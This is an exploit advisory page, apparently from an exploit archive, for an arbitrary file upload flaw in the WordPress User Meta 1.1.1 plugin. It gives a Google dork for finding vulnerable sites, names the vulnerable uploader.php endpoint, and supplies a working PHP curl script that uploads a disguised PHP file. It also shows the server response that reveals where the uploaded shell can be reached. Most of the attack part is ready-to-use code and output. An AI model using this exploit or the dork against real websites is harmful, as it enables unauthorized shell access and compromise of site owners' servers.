WordPress User Meta 1.1.1 Shell Upload

2012.06.13
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

########################################################### # # Exploit Title: Wordpress User Meta Version 1.1.1 Arbitrary File Upload # Google Dork: inurl:wp-content/plugins/user-meta/framework/helper/ # Date: 11/06/2012 # Exploit Author: Adrien Thierry # Vendor Homepage: http://user-meta.com/ # Software Link: http://downloads.wordpress.org/plugin/user-meta.1.1.1.zip # Version: 1.1.1 # ########################################################### Vuln page : http://mysite.com/wp-content/plugins/user-meta/framework/helper/uploader.php exploit : <?php $u="C:\Program Files (x86)\EasyPHP-5.3.9\www\info.php.jpg"; $c = curl_init("http://127.0.0.1/wp/wp-content/plugins/user-meta/framework/helper/uploader.php"); curl_setopt($c, CURLOPT_POST, true); curl_setopt($c, CURLOPT_POSTFIELDS, array('qqfile'=>"@$u")); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); $e = curl_exec($c); curl_close($c); echo $e; ?> Shell access : Shown in result of exploit ex : {"success":true,"fieldname":null,"filepath":"\/2012\/06\/1339356494.jpg"} access : http://mysite.com/wp-content/uploads/2012/06/1339356494.jpg #####################################################################

References:

http://user-meta.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top